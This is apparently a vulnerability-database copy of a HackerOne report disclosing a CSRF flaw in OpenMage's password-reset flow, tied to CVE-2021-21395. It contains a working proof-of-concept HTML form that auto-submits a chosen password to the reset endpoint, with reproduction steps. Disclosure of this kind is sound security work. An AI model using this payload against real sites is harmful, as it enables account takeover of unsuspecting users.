Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneXenxH1:1086752
HistoryJan 25, 2021 - 2:47 p.m.

OpenMage: CSRF in changing password after using reset password link

2021-01-2514:47:04
xenx
hackerone.com
13

EPSS

0.001

Percentile

33.3%

JSON

Summary:

Hey OpenMage, the forgot password page is not protected against CSRF attack which can lead to changing password. Use the below form to test

<html> 
  <body>
    <form  action="https://demo.openmage.org/customer/account/resetpasswordpost/" method="POST">
      <input type="hidden" name="password" value="password123" />
      <input type="hidden" name="confirmation" value="password123" />
    </form>
   <script>document.forms[0].submit()</script>
  </body>
</html>

Steps To Reproduce:

  1. Go to https://demo.openmage.org/customer/account/forgotpassword/
  2. Enter your email and ask for password reset link
  3. Load the password reset link and after loading it close it
  4. Now load the above form and boom, password will be changed.

Impact

Password reset via CSRF

Related

nvd 1
osv 2
github 1
cve 1
prion 1
veracode 1
cvelist 1
nvd
nvd
CVE-2021-21395
2023-01-27 16:15:08
osv
osv
magento-lts Reset Password not protected against well-timed CSRF
2023-01-26 19:51:48
CVE-2021-21395
2023-01-27 16:15:08
github
github
magento-lts Reset Password not protected against well-timed CSRF
2023-01-26 19:51:48
cve
cve
CVE-2021-21395
2023-01-27 16:15:08
prion
prion
Cross site request forgery (csrf)
2023-01-27 16:15:00
veracode
veracode
Cross-Site Request Forgery (CSRF)
2023-02-16 05:58:59
cvelist
cvelist
CVE-2021-21395 Magneto-lts vulnerable to Cross-Site Request Forgery
2023-01-27 15:03:32

EPSS

0.001

Percentile

33.3%

JSON
Related for H1:1086752
nvd1osv2github1cve1prion1veracode1cvelist1